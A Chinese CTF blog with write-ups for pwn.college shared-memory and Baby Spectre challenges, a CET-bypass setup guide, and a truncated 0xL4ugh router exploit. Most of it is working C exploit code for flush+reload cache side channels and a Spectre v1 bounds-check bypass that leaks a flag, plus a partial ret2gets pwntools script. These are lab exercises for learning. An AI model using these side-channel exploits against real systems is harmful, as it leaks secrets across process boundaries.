前两道题不记分，估计是用来让我们熟悉一下共享内存的。

话不多说，直接逆。

main 先调用这个函数，把 flag 读到 bss 了，没啥说的。

int read_flag_to_global()
{
  int v1; // [rsp+8h] [rbp-8h]
  int fd; // [rsp+Ch] [rbp-4h]

  fd = open("/flag", 0);
  v1 = read(fd, &flag_val, 0x100u);
  if ( !fd || v1 <= 0 )
  {
    printf("Failed to read flag file.  Exiting");
    exit(1);
  }
  return close(fd);
}

然后是核心逻辑：

必须要 argc 大于 1，也就是除了 argv[0] 外我们起码还得多传一个参数，那具体要几个，以及，这个参数是干啥的呢？

我们注意到 argv[1] 被复制到了 dest，所以这个参数是必要的，没有溢出，设置了 NULL terminate，然后又创建了一个 argva 参数列表，列表里只有一个参数，即 dest。

  if ( argc > 1 )
  {
    strncpy(dest, argv[1], 0x12Bu);
    dest[299] = 0;
    argva[0] = dest;
    argva[1] = 0;
    shared_page = make_shared_page(&p_sem);
    v12 = (int)time(0) % 13;
    pin_cpu(v12);
    printf("Pinning processes to CPU %d\n", v12);
    v14 = fork();
    if ( v14 )
    {
      printf("Launching your code as PID: %d!\n", v14);
      puts("----------------");
      wait(0);
      v11 = inject_open_shm(v14);
      inject_mmap(v14, v11);
      inject_drop_privs(v14);
      sem = p_sem;
      sem_init(p_sem, 1, 0);
      v9 = sem + 1;
      *(_DWORD *)sem[1].__size = 0;
      fd = open("/flag", 0);
      buf = (char *)&p_sem[1].__align + 4;
      read(fd, (char *)&p_sem[1].__align + 4, 0x50u);
      printf("The flag is now in memory at %p\n", buf);
      ptrace_detatch(v14);
      shm_unlink("/pwncollege");
      puts("### Goodbye!");
    }
    else
    {
      ptrace(PTRACE_TRACEME, 0, 0, 0);
      execv(dest, argva);
    }
    return 0;
  }
  else
  {
    puts("ERROR: argc < 2!");
    return 1;
  }

接着创建共享页，并设置大小为 0x101000，然后映射到 0x1337000，权限是 PROT_READ | PROT_WRITE，flag 是 MAP_FIXED | MAP_SHARED，即必须映射到 addr 指定的地址且映射和 fd 背后的对象共享，即访问这个映射地址就是访问共享内存。

此外，0x1337000 这个地址也将用作全局变量 p_sem，根据定义，这是一个 semaphore。然后将共享内存的 fd 返回，给到 shared_page。

__int64 __fastcall make_shared_page(sem_t **p_sem)
{
  unsigned int fd; // [rsp+1Ch] [rbp-4h]

  puts("Creating Shared memory");
  shm_unlink("/pwncollege");
  fd = shm_open("/pwncollege", 66, 0x1C7u);
  ftruncate(fd, 0x101000);
  *p_sem = (sem_t *)mmap((void *)0x1337000, 0x101000u, 3, 32769, fd, 0);
  if ( *p_sem != (sem_t *)0x1337000 )
    __assert_fail("*addr == (char *) mmap_addr", "babyarchmemflag.c", 0x169u, "make_shared_page");
  return fd;
}

接着用当前的时间作为 seed 随机将程序绑定到 $[0, 13)$ 的一个 CPU Core 上运行。

int __fastcall pin_cpu(int n0x3FF)
{
  cpu_set_t cpuset; // [rsp+10h] [rbp-90h] BYREF
  unsigned __int64 n0x3FF_1; // [rsp+98h] [rbp-8h]

  memset(&cpuset, 0, sizeof(cpuset));
  n0x3FF_1 = n0x3FF;
  if ( (unsigned __int64)n0x3FF <= 1023 )
    cpuset.__bits[n0x3FF_1 >> 6] |= 1LL << (n0x3FF_1 & 63);
  return sched_setaffinity(0, 0x80u, &cpuset);
}

然后创建子进程，子进程会执行 dest，因此，我们知道 argv[1] 其实需要传递一个程序路径。此外，由于子进程设置了 PTRACE_TRACEME，所以父进程可以修改子进程的 stats 。

一旦 execv 执行成功，内核会自动 SIGTRAP，子进程暂停，父进程开始 ptrace 操作子进程。

      ptrace(PTRACE_TRACEME, 0, 0, 0);
      execv(dest, argva);

父进程通过 wait(0) 确保子进程发出 SIGTRAP 信号后，开始 ptrace，进行一些操作，具体内容自己分析太恶心了，丢给 AI 就好了，我就不写了。大致结果就是将 victim 打开的共享内存页注入到我们的 exp 程序中，省去了我们手动 mmap 绑定的步骤。

然后将 0x1337000，也就是 p_sem 信号量联合体初始化为 0，之后 open flag，将 flag 读到 (char *)&p_sem[1].__align + 4 的位置，这个可以看一下 sem_t 的定义：

#if __WORDSIZE == 64
# define __SIZEOF_SEM_T 32
#else
# define __SIZEOF_SEM_T 16
#endif

typedef union
{
  char __size[__SIZEOF_SEM_T];
  long int __align;
} sem_t;

因此它其实就是将 flag 读到了第二个联合体的地址加四的位置。之后 ptrace_detatch 让子进程继续跑。

所以我们只要写一个程序去输出 flag 被加载到的位置就好了。

Exploit

#include <semaphore.h>
#include <unistd.h>

#define SHM_BASE 0x1337000
#define SEM_SIZE sizeof(sem_t)
#define OFFSET (SEM_SIZE + 4)
#define FLAG_ADDR (char *)(SHM_BASE + OFFSET)

int main(int argc, char *argv[]) {
  write(1, FLAG_ADDR, 0x100);
  return 0;
}

Shared Memory 2.0

Information

Category: Pwn

Description

Get started with interacting with processes via shared memory.

Write-up

和上题差不多，区别是父进程的实现：

    if ( v14 )
    {
      printf("Launching your code as PID: %d!\n", v14);
      puts("----------------");
      wait(0);
      v11 = inject_open_shm(v14);
      inject_mmap(v14, v11);
      inject_drop_privs(v14);
      sem = p_sem;
      sem_init(p_sem, 1, 0);
      v9 = sem + 1;
      *(_DWORD *)sem[1].__size = 0;
      printf("This challenge will read the flag into memory when the semaphore located at %p is incremented.", sem);
      ptrace_detatch(v14);
      sem_wait(sem);
      fd = open("/flag", 0);
      buf = (char *)&p_sem[1].__align + 4;
      read(fd, (char *)&p_sem[1].__align + 4, 0x50u);
      printf("The flag is now in memory at %p\n", buf);
      shm_unlink("/pwncollege");
      puts("### Goodbye!");
    }

ptrace_detatch 之后 sem_wait(sem) 等待信号量被消耗，然后才会去 open, read flag 。但是由于这个信号量被 sem_init(p_sem, 1, 0) 初始化为 0，所以我们的子进程应该使用 sem_post 增加一下信号量，否则程序会一直等待。

Exploit

#include <semaphore.h>
#include <unistd.h>

#define SHM_BASE 0x1337000
#define SEM_SIZE sizeof(sem_t)
#define OFFSET (SEM_SIZE + 4)
#define FLAG_ADDR (char *)(SHM_BASE + OFFSET)
#define SEM_ADDR (sem_t *)SHM_BASE

int main(int argc, char *argv[]) {
  sem_post(SEM_ADDR);
  write(1, FLAG_ADDR, 0x100);
  return 0;
}

Baby Spectre 1

Information

Category: Pwn

Description

Get started with a binary that side-channels itself!

Write-up

正菜才刚刚开始。

简单逆向一下，我们可知 &sem[1] = p_sem = 0x1337000，会被初始化为 0，由于后续 sem_wait(*(sem_t **)&sem[1]) 的阻塞，故需要我们手动增加这个信号量，否则不会执行攻击；&sem[1] + 32LL 则是用于控制要访问的 flag byte 的 idx 。

然后这部分是非阻塞式地检查子进程有没有退出，退出则结束程序：

pid_1 = waitpid(pid, &stat_loc, 1);
if ( pid == pid_1 )
  break;

flush_cache 会将以 0x1337000 为基页的第二页，即 0x1338000 从 cache 中清空。

之后的 &p_sem[128 * flag_val[*idx] + 128]; 其实就是 *(0x1337000 + 0x1000 * flag_byte + 0x1000)，也就是摸了一下 0x1338000 + flag_byte * 0x1000 这一页，让这一页的前 64 字节进入 L1 Cache 。

:::tip 至于为什么是 0x1000，其实是因为 C 是根据 sizeof(type) 进行索引换算的，即 sem_t *p_sem 在 C 语言的逻辑里：p_sem[N] 的实际地址为 p_sem + (N * sizeof(sem_t))，由于 sizeof(sem_t) == 0x20，所以这里的两个 128 其实应该换算为 0x1000。

这里看汇编的话其实更清楚，因为可以直接看到换算后的结果：

main+594  mov     rax, [rbp+idx]
main+59B  mov     eax, [rax]
main+59D  cdqe
main+59F  lea     rdx, flag_val
main+5A6  movzx   eax, byte ptr [rax+rdx]
main+5AA  mov     [rbp+var_A72], al
main+5B0  mov     rax, [rbp+p_sem]
main+5B7  movsx   edx, [rbp+var_A72]
main+5BE  shl     edx, 0Ch
main+5C1  movsxd  rdx, edx
main+5C4  add     rdx, 1000h
main+5CB  add     rax, rdx
main+5CE  mov     [rbp+var_A40], rax

:::

接着 get_timing_data(idx, *(sem_t **)&sem[1], (__int64)timing_data); 内部会执行 256 次计时，统计 0x1338000 + [0, 255] * 0x1000 这 256 页的访问时间，写到 timing_data 数组。由于 *(_QWORD *)(8LL * (unsigned __int8)(-89 * i + 13) + timing_data)，我们可知 timing_data 是按照 _QWORD 访问的。

最后，下面的代码将 timing_data 的数据写到攻击者可访问的共享内存中，也就是 0x1338000 + __size[8 * i]，所以这也是将 0x1338000 视作一个按照 _QWORD 访问的数组，每个索引对应了 timing_data[i] 的计时信息。因此，只要这个计时信息小于 hit cache threshold，我们就认为对应的 page 包含一个 flag byte，而由于 flag byte 的存储是按照 *(0x1337000 + 0x1000 * flag_byte + 0x1000) 的形式访问的，所以我们只要将这个 page 的索引转换为对应的 ASCII 即可泄漏 flag 的值。

for ( i = 0; i <= 255; ++i )
{
  v14 = p_sem + 128;
  *(_QWORD *)&p_sem[128].__size[8 * i] = timing_data[i];
}

Exploit

欣赏一下我的预言机版本半自动化 Pwn Framework xD

#include <axium/axium.h>

#define SHM_BASE ((char *)0x1337000)
#define SEM_OFFSET 0
#define IDX_ARRAY_OFFSET sizeof(sem_t)
#define TIMING_ARRAY_OFFSET 0x1000
#define TIMING_ARRAY_SIZE 256

/**
 * @brief Context for the challenge environment.
 */
typedef struct {
  sem_t *sem;             /**< Semaphore for synchronization. */
  int *idx_array;         /**< Index selection in shared memory. */
  uint64_t *timing_array; /**< Timing results in shared memory. */
} challenge_ctx_t;

/**
 * @brief Triggers the victim to perform a measurement.
 */
static void trigger(size_t idx_array, void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
  *c->idx_array = (int)idx_array;
  c->timing_array[TIMING_ARRAY_SIZE - 1] = 0; /* Clear synchronizing sentinel */
  sem_post(c->sem);
}

/**
 * @brief Waits for the victim to finish measurement.
 */
static bool wait(void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
  /* Wait up to 1 second, checking every 100us */
  return wait_until(c->timing_array[TIMING_ARRAY_SIZE - 1] != 0, 1.0, 100);
}

int main(void) {
  set_log_level(DEBUG);

  /* Match challenge's CPU affinity for stable measurements */
  set_cpu_affinity(time(NULL) % 13);

  /* clang-format off */
  challenge_ctx_t ctx = {
    .sem = (sem_t *)(SHM_BASE + SEM_OFFSET),
    .idx_array = (int *)(SHM_BASE + IDX_ARRAY_OFFSET),
    .timing_array = (uint64_t *)(SHM_BASE + TIMING_ARRAY_OFFSET)
  };

  schan_ops_t ops = {
    .trigger = trigger,
    .wait = wait,
    .analyze = NULL
  };
  /* clang-format on */

  schan_oracle_t schan_oracle;
  schan_oracle_init(&schan_oracle, ops, ctx.timing_array, TIMING_ARRAY_SIZE,
                    &ctx);

  /* Upcast to generic oracle for high-level scanning */
  oracle_t *oracle = &schan_oracle.base;

  log_info("Starting exploit...");

  char flag[256] = {0};
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');

  if (leaked > 0) {
    log_success("Flag: %s", flag);
  } else {
    log_error("Exploit failed.");
  }

  return 0;
}

Baby Spectre 2

Information

Category: Pwn

Description

A binary that side-channels itself, now using multiple pages.

Write-up

这题就是给每个索引都开了一个 0x1000 大小的页，p_align = &p_sem[128 * i + 128].__align;，所以最好的办法应该是自己重构一个结果数组然后寻找最优匹配。

Exploit

#include <axium/axium.h>

#define SHM_BASE ((char *)0x1337000)
#define SEM_OFFSET 0
#define IDX_ARRAY_OFFSET sizeof(sem_t)
#define TIMING_ARRAY_OFFSET 0x1000
#define TIMING_ARRAY_SIZE 256

typedef struct {
  sem_t *sem;
  int *idx_array;
  uint64_t *timing_array;
  uint64_t results[TIMING_ARRAY_SIZE];
} challenge_ctx_t;

static void trigger(size_t idx_array, void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
  *c->idx_array = (int)idx_array;
  uint64_t *sentinel =
      (uint64_t *)((char *)c->timing_array + 0x1000 * (TIMING_ARRAY_SIZE - 1));
  *sentinel = 0;
  sem_post(c->sem);
}

static bool wait(void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
  uint64_t *sentinel =
      (uint64_t *)((char *)c->timing_array + 0x1000 * (TIMING_ARRAY_SIZE - 1));

  if (!wait_until(*sentinel != 0, 1.0, 100)) {
    return false;
  }

  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
    c->results[i] = *(uint64_t *)((char *)c->timing_array + 0x1000 * i);
  }

  return true;
}

int main(void) {
  set_log_level(DEBUG);
  set_cpu_affinity(time(NULL) % 13);

  /* clang-format off */
  challenge_ctx_t ctx = {
    .sem = (sem_t *)(SHM_BASE + SEM_OFFSET),
    .idx_array = (int *)(SHM_BASE + IDX_ARRAY_OFFSET),
    .timing_array = (uint64_t *)(SHM_BASE + TIMING_ARRAY_OFFSET)
  };

  schan_ops_t ops = {
    .trigger = trigger,
    .wait = wait,
    .analyze = NULL
  };
  /* clang-format on */

  schan_oracle_t schan_oracle;
  schan_oracle_init(&schan_oracle, ops, ctx.results, TIMING_ARRAY_SIZE, &ctx);

  oracle_t *oracle = &schan_oracle.base;

  log_info("Starting exploit...");

  char flag[256] = {0};
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');

  if (leaked > 0) {
    log_success("Flag: %s", flag);
  } else {
    log_error("Exploit failed.");
  }

  return 0;
}

Baby Spectre 3

Information

Category: Pwn

Description

Measure memory access timings to leak the flag via a side-channel.

Write-up

到底是什么神人写个 exp 持续浪费 CPU 资源，还不结束的！他不会真以为自己一直跑就能赢吧……他不会挂着 exp 去睡觉了吧……我的 flag 啊～

Exploit

#include <axium/axium.h>

#define SHM_BASE ((char *)0x1337000)
#define SEM_OFFSET 0
#define IDX_ARRAY_OFFSET sizeof(sem_t)
#define TIMING_ARRAY_SIZE 256

typedef struct {
  sem_t *sem;
  int *idx_array;
  char *probe_base;
  uint64_t results[TIMING_ARRAY_SIZE];
} challenge_ctx_t;

static void trigger(size_t idx_array, void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
  *c->idx_array = (int)idx_array;
  sem_post(c->sem);
}

static bool wait(void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;

  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
    int idx = MIXED_IDX(i, 255);
    char *addr = c->probe_base + 0x1000 * idx;

    uint64_t start = probe_start();
    maccess(addr);
    uint64_t end = probe_end();

    c->results[idx] = end - start;
  }

  return true;
}

int main(void) {
  set_log_level(DEBUG);
  set_cpu_affinity(time(NULL) % 13);

  /* clang-format off */
  challenge_ctx_t ctx = {
    .sem = (sem_t *)SHM_BASE,
    .idx_array = (int *)((sem_t *)SHM_BASE + 1),
    .probe_base = (char *)SHM_BASE + 0x1000
  };

  schan_ops_t ops = {
    .trigger = trigger,
    .wait = wait,
    .analyze = NULL
  };
  /* clang-format on */

  schan_oracle_t schan_oracle;
  schan_oracle_init(&schan_oracle, ops, ctx.results, TIMING_ARRAY_SIZE, &ctx);

  oracle_t *oracle = &schan_oracle.base;

  log_info("Starting exploit...");

  char flag[256] = {0};
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');

  if (leaked > 0) {
    log_success("Flag: %s", flag);
  } else {
    log_error("Exploit failed.");
  }

  return 0;
}

Baby Spectre 4

Information

Category: Pwn

Description

Perform a full flush and reload side-channel attack!

Write-up

不是哥们，我这题都秒了，上题却因为有傻逼持续浪费 CPU 而导致我拿不到 flag，让我拿到一堆噪声我也是无语了。

Exploit

#include <axium/axium.h>

#define SHM_BASE ((char *)0x1337000)
#define SEM_OFFSET 0
#define IDX_ARRAY_OFFSET sizeof(sem_t)
#define TIMING_ARRAY_SIZE 256

typedef struct {
  sem_t *sem;
  int *idx_array;
  char *probe_base;
  uint64_t results[TIMING_ARRAY_SIZE];
} challenge_ctx_t;

static void trigger(size_t idx_array, void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;

  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
    clflush(c->probe_base + 0x1000 * i);
  }
  mfence();

  *c->idx_array = (int)idx_array;
  sem_post(c->sem);
}

static bool wait(void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;

  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
    int idx = MIXED_IDX(i, 255);
    char *addr = c->probe_base + 0x1000 * idx;

    uint64_t start = probe_start();
    maccess(addr);
    uint64_t end = probe_end();

    c->results[idx] = end - start;
  }

  return true;
}

int main(void) {
  set_log_level(DEBUG);
  set_cpu_affinity(time(NULL) % 13);

  /* clang-format off */
  challenge_ctx_t ctx = {
    .sem = (sem_t *)SHM_BASE,
    .idx_array = (int *)((sem_t *)SHM_BASE + 1),
    .probe_base = (char *)SHM_BASE + 0x1000
  };

  schan_ops_t ops = {
    .trigger = trigger,
    .wait = wait,
    .analyze = NULL
  };
  /* clang-format on */

  schan_oracle_t schan_oracle;
  schan_oracle_init(&schan_oracle, ops, ctx.results, TIMING_ARRAY_SIZE, &ctx);

  oracle_t *oracle = &schan_oracle.base;

  log_info("Starting exploit...");

  char flag[256] = {0};
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');

  if (leaked > 0) {
    log_success("Flag: %s", flag);
  } else {
    log_error("Exploit failed.");
  }

  return 0;
}

Baby Spectre 5

Information

Category: Pwn

Description

This binary never reads the flag bytes.. or does it?

Write-up

这题对于摸 flag 有条件，即 (float)((float)*p_align / 257.0) > 1.0，也就是传入的索引起码为 258 才可以进入这个 if 分支，但是如果是 258 的话，又摸不到 flag……

if ( (float)((float)*p_align / 257.0) > 1.0 )
  v12 = &p_sem[128 * flag_val[*p_align] + 128];

所以这题其实是打 Spectre v1 Bounds Check Bypass (BCB) CVE-2017-5753，通过多次传入 258 以训练（欺骗）CPU 的 Branch Prediction Unit (BCB)，让它认为程序极有可能进入这个 if 分支，导致推测性的执行 if 分支内的代码（前提是要有足够的时间去 Speculative Execution，所以这里才使用浮点数计算。因为通常浮点数计算消耗的 cycles 都很大，这为推测执行提供了充足的执行窗口。）

So ? 我写了一个自动化的 Spectre v1 BCB 漏洞利用框架，能应对强噪声环境，还提供了各种统计分析工具……自己研究去吧～

~~感觉我的 wp 写的越来越简略了，不过我觉得，都学到这一步了的人，应该不难理解吧？所以啰里巴嗦的概念我就不写了（~~

Exploit

#include <axium/axium.h>

#define SHM_BASE ((char *)0x1337000)
#define PAGE_SIZE 0x1000
#define TIMING_ARRAY_SIZE 256

typedef struct {
  sem_t *sem;
  int *idx_addr;
  char *probe_base;
  uint64_t results[TIMING_ARRAY_SIZE];
} challenge_ctx_t;

static uint64_t cache_threshold = -1;
static int training_byte_to_ignore = -1;

static void victim_callback(void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
  sem_post(c->sem);
}

static void trigger_wrapper(size_t idx, void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;

  /* clang-format off */
  spectre_config_t config = {
    .variant = SPECTRE_V1_BCB,
    .v1 = {
      .index_addr = c->idx_addr,
      .index_size = sizeof(int),
      .training_val = 258,
      .attack_val = idx,
    },
    .ratio = 4,
    .trials = 100,
    .sync_delay = 0,
    .post_delay = 100
  };
  /* clang-format on */

  cache_flush_range(c->probe_base, PAGE_SIZE * TIMING_ARRAY_SIZE);
  mfence();
  spectre_v1(&config, victim_callback, c);
}

static bool wait_wrapper(void *ctx) {
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
  for (int i = 0; i < 256; i++) {
    int idx = MIXED_IDX(i, 255);
    char *addr = c->probe_base + PAGE_SIZE * idx;

    uint64_t start = probe_start();
    maccess(addr);
    uint64_t end = probe_end();

    c->results[idx] = end - start;
  }
  return true;
}

static int analyze_wrapper(const uint64_t *data, size_t len, void *ctx) {
  (void)ctx;
  uint64_t min_time = cache_threshold;
  int best_index = -1;
  for (int i = 0; i < (int)len; i++) {
    if (i == training_byte_to_ignore)
      continue;
    if (data[i] > 0 && data[i] < min_time) {
      min_time = data[i];
      best_index = i;
    }
  }
  return best_index;
}

int main(void) {
  set_log_level(DEBUG);
  set_cpu_affinity(time(NULL) % 13);

  /* clang-format off */
  challenge_ctx_t ctx = {
    .sem = (sem_t *)SHM_BASE,
    .idx_addr = (int *)((sem_t *)SHM_BASE + 1),
    .probe_base = (char *)SHM_BASE + PAGE_SIZE
  };

  schan_ops_t ops = {
    .trigger = trigger_wrapper,
    .wait = wait_wrapper,
    .analyze = analyze_wrapper
  };
  /* clang-format on */

  cache_threshold = cache_calibrate_threshold(ctx.probe_base);

  log_info("Profiling bias...");
  trigger_wrapper(258, &ctx);
  wait_wrapper(&ctx);
  training_byte_to_ignore = find_best_hit(ctx.results, 256);

  schan_oracle_t oracle;
  schan_oracle_init(&oracle, ops, ctx.results, 256, &ctx);

  char flag[256] = {0};
  log_info("Starting statistical scan...");

  ssize_t leaked = oracle_scan_stat(&oracle.base, flag, sizeof(flag) - 1, '}',
                                    50, 2, 10, NULL, 256);
  if (leaked > 0) {
    log_success("Flag: %s", flag);
  } else {
    log_error("Exploit failed.");
  }

  return 0;
}

Baby Spectre 6

Information

Category: Pwn

Description

Locate the flag in memory using shellcode after all references to it have been DESTROYED, you will only have access to the "exit" system call. You will need a creative way of locating the flag's address in your process!

Write-up

Exploit

Intel Control-flow Enforcement Technology Bypass

Mon, 26 Jan 2026 00:00:00 GMT

简介

Intel Control-flow Enforcement Technology (CET) 由 Shadow stack (SHSTK) 和 Indirect branch tracking (IBT) 两部分组成，它们分别实现了不同的防护：

The kernel must map a region of memory for the shadow stack not writable to user space programs except by special instructions. The shadow stack stores a copy of the return address of each CALL. On a RET, the processor checks if the return address stored in the normal stack and shadow stack are equal. If the addresses are not equal, the processor generates an INT #21 (Control Flow Protection Fault).

Indirect branch tracking detects indirect JMP or CALL instructions to unauthorized targets. It is implemented by adding a new internal state machine in the processor. The behavior of indirect JMP and CALL instructions is changed so that they switch the state machine from IDLE to WAIT_FOR_ENDBRANCH. In the WAIT_FOR_ENDBRANCH state, the next instruction to be executed is required to be the new ENDBRANCH instruction (ENDBR32 in 32-bit mode or ENDBR64 in 64-bit mode), which changes the internal state machine from WAIT_FOR_ENDBRANCH back to IDLE. Thus every authorized target of an indirect JMP or CALL must begin with ENDBRANCH. If the processor is in a WAIT_FOR_ENDBRANCH state (meaning, the previous instruction was an indirect JMP or CALL), and the next instruction is not an ENDBRANCH instruction, the processor generates an INT #21 (Control Flow Protection Fault). On processors not supporting CET indirect branch tracking, ENDBRANCH instructions are interpreted as NOPs and have no effect.

简单来说就是如下表所示的这些：

特性	SHSTK	IBT
所属体系	Intel CET	Intel CET
防御重点	函数返回地址	间接跳转 / 调用
防御攻击类型	ROP	JOP / COP
检测时机	执行 RET 指令时	执行间接跳转后的下一条指令
硬件实现	维护独立的受保护栈空间	状态机检查特定的起始标记指令

检查硬件支持性

使用以下脚本测试 CPU 是否支持 SHSTK 和 IBT：

#include <cpuid.h>
#include <stdint.h>
#include <stdio.h>

int cpu_supports_cet_shadow_stack() {
  uint32_t eax = 0, ebx = 0, ecx = 0, edx = 0;
  __cpuid_count(7, 0, eax, ebx, ecx, edx);
  return (ecx & (1 << 7)) != 0;
}

int cpu_supports_cet_ibt() {
  uint32_t eax = 0, ebx = 0, ecx = 0, edx = 0;
  __cpuid_count(7, 0, eax, ebx, ecx, edx);
  return (edx & (1 << 20)) != 0;
}

int main() {
  if (cpu_supports_cet_shadow_stack()) {
    puts("CET Shadow Stack is supported");
  }

  if (cpu_supports_cet_ibt()) {
    puts("CET IBT is supported");
  }
}

由于我的 CPU 是 AMD Ryzen 7 4800H，所以硬件层还没支持 CET，只能通过 patch 后的 QEMU 模拟了。

模拟环境搭建

这里使用的是 QEMU-8.2.2-CET: A Pseudo-Intel-CET Plugin of QEMU，提供了一个伪 Intel CET 插件用于模拟 SHSTK 和 IBT 。

这个项目最后更新在两年前，而我的内核版本，gcc 和 glibc 都比较新，所以还需要自己 patch 几个地方才可以编译。

λ ~/ uname -a
Linux Lux 6.18.6-zen1-1-zen #1 ZEN SMP PREEMPT_DYNAMIC Sun, 18 Jan 2026 00:33:55 +0000 x86_64 GNU/Linux
λ ~/ ldd --version
ldd (GNU libc) 2.42
Copyright (C) 2024 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
λ ~/ gcc --version
gcc (GCC) 15.2.1 20260103
Copyright (C) 2025 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Patch QEMU-8.2.2-CET

要改的地方不多，也就下面这三个文件：

diff --git a/linux-user/strace.c b/linux-user/strace.c
index cf26e5526..a18ad1ee6 100644
--- a/linux-user/strace.c
+++ b/linux-user/strace.c
@@ -51,7 +51,8 @@ struct flags {
 };

 /* No 'struct flags' element should have a zero mask. */
-#define FLAG_BASIC(V, M, N)      { V, M | QEMU_BUILD_BUG_ON_ZERO(!(M)), N }
+// #define FLAG_BASIC(V, M, N)      { V, M | QEMU_BUILD_BUG_ON_ZERO(!(M)), N }
+#define FLAG_BASIC(V, M, N)      { V, M, N }

 /* common flags for all architectures */
 #define FLAG_GENERIC_MASK(V, M)  FLAG_BASIC(V, M, #V)

diff --git a/linux-user/syscall.c b/linux-user/syscall.c
index 189eec0ec..e0205582c 100644
--- a/linux-user/syscall.c
+++ b/linux-user/syscall.c
@@ -365,18 +365,19 @@ _syscall3(int, sys_sched_getaffinity, pid_t, pid, unsigned int, len,
 _syscall3(int, sys_sched_setaffinity, pid_t, pid, unsigned int, len,
           unsigned long *, user_mask_ptr);
 /* sched_attr is not defined in glibc */
-struct sched_attr {
-    uint32_t size;
-    uint32_t sched_policy;
-    uint64_t sched_flags;
-    int32_t sched_nice;
-    uint32_t sched_priority;
-    uint64_t sched_runtime;
-    uint64_t sched_deadline;
-    uint64_t sched_period;
-    uint32_t sched_util_min;
-    uint32_t sched_util_max;
-};
+/* Use kernel-provided struct sched_attr */
+// struct sched_attr {
+//     uint32_t size;
+//     uint32_t sched_policy;
+//     uint64_t sched_flags;
+//     int32_t sched_nice;
+//     uint32_t sched_priority;
+//     uint64_t sched_runtime;
+//     uint64_t sched_deadline;
+//     uint64_t sched_period;
+//     uint32_t sched_util_min;
+//     uint32_t sched_util_max;
+// };
 #define __NR_sys_sched_getattr __NR_sched_getattr
 _syscall4(int, sys_sched_getattr, pid_t, pid, struct sched_attr *, attr,
           unsigned int, size, unsigned int, flags);

diff --git a/linux-user/signal-common.h b/linux-user/signal-common.h
index 3e2dc604c..3f59ffe82 100644
--- a/linux-user/signal-common.h
+++ b/linux-user/signal-common.h
@@ -113,7 +113,9 @@ int process_sigsuspend_mask(sigset_t **pset, target_ulong sigset,
 static inline void finish_sigsuspend_mask(int ret)
 {
     if (ret != -QEMU_ERESTARTSYS) {
-        TaskState *ts = (TaskState *)thread_cpu->opaque;
+        // TaskState *ts = (TaskState *)thread_cpu->opaque;
+        CPUState *cpu = current_cpu;
+        TaskState *ts = (TaskState *)cpu->opaque;
         ts->in_sigsuspend = 1;
     }
 }

Build

然后进入项目根目录，执行以下指令来 build：

mkdir build && cd build
../configure --enable-plugins --enable-seccomp --enable-tcg-interpreter --target-list=x86_64-linux-user --disable-docs --disable-werror
make -j`nproc`

Build 完插件会生成在 ./build/tests/plugin/libcet.so。

我们只需要创建一个软链接：

ln -s ./build/qemu-x86_64 /path/to/qemu-x86_64-cet
ln -s ./build/tests/plugin/libcet.so /path/to/plugin/libcet.so

然后使用下面任意指令来执行编译出来带 SHSTK 或者 IBT 的程序进行测试：

# without the plugin logs
/path/to/qemu-x86_64-cet -plugin /path/to/plugin/libcet.so,mode=user,ibt=on,ss=on,cpu_slots=128 ./test_cet

# with the plugin logs
/path/to/qemu-x86_64-cet -plugin /path/to/plugin/libcet.so,mode=user,ibt=on,ss=on,cpu_slots=128 -d plugin ./test_cet

Challenge

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void timedout(int) {
  puts("timedout");
  exit(0);
}

char g_buf[256];

int main() {
  char buf[16];
  long long int arg1 = 0;
  long long int arg2 = 0;
  void (*func)(long long int, long long int, long long int) = NULL;

  alarm(30);
  signal(SIGALRM, timedout);

  fgets(g_buf, 256, stdin); // My mercy
  fgets(buf, 256, stdin);
  if (func)
    func(arg1, arg2, 0);
}

题目代码如上，使用下面的脚本来编译：

gcc chall.c -fno-stack-protector -fcf-protection=full -mshstk -fno-omit-frame-pointer -static -o chall

Write-up

TODO

Exploit

TODO

Write-ups: 0xL4ugh CTF v5

Sat, 24 Jan 2026 00:00:00 GMT

Awesome Router

Information

Category: IoT

Description

Trust me, if this challenge solved in the inteneded way, there is a lot of fun ; )

Write-up

There exits gets and puts in bin/fetcher, so we can use ret2gets trick for a ez shell :D

And the rest work are for webers, the Pwn part is done LOL

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    p32,
    process,
    raw_input,
    remote,
    u64,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./fetcher_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc
rop = ROP(libc)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
